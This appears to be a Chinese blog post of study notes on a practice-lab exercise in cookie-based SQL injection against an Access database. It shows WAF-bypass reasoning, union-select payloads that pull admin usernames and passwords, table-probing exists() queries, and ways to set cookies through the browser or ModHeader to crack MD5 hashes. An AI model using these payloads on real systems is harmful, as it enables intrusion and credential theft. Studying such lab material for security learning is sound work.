cookie注入学习笔记

【靶场:9题,第二章、遇到阻难!绕过WAF过滤!】

一、cookie 注入
绕过waf(防火墙)拿到管理员账号及密码。

1、access联合注入
2、cookie注入
3、md5加密

sql注入的一般流程:
(1)、判断注入点(字符型',报错、' -- zhushi,正常;数字型 and 1=2,报错、 and 1=1,正常)。
(2)、判断字段数(order by 3,报错,order by 2,正常,那么说明有2个字段)。
(3)、判断回显点(union、limit,使数据库查询到的内容显示到页面上)。
(4)、查询相关内容(获取账号、密码)。

非法传参拦截:
?id=191 and 1=1
报错为【说明进行了特殊过滤/处理】

请不要在参数中出现: and update delete;insert mid master等非法字符!

提交数据大多时候是get\post方式,并对get\post参数的特殊字符进行了拦截,但有时候使用cookie也可传参,或许特殊字符未被拦截。

判断是否可以通过cookie进行传参(把原本访问参数删除,放到cookie中传参,能正常访问,则说明可以cookie传参)


id=171+order+by+10
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
id=171+union+select+1,2,3,4,5,6,username,password,9,10+from+admin

注意:cookie中+代表空格。

删除参数报错后,火狐浏览器f12,点击存储,在cookie下新增一行,key、value(id、171)


插件:
火狐浏览器 --》附加组件--》搜索cookie或ModHeader【几乎都可以用】


如ModHeader:

——表示ModHeader正在运行,点击一下则暂停ModHeader;表示ModHeader在暂停中,点击一下则运行ModHeader。
——cookie自动补全才有效,value改成id=171
——打钩表示使用
——cookie里面的空格要使用+号来代替

二、相关内容:

猜测的表名:user、admin
?id=191 union select 1,2,3,4,5,6,7,8,9,10 from admin
access数据库union查询后,优先显示后表查询出的内容
刚好和mysql显示顺序相反,语法也限制更大(access查询语法要求加表名)

探测表名:exists()
?id=191 and exists(select * from admin)
?id=191 and exists(select username,password from admin)
收集常见的用户表名称、字段名称

md5:字母+数字的结合16位或32位,md5就是文本处理,所谓的md5破解就是撞库
如:https://www.cmd5.com
       https://www.somd5.com

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值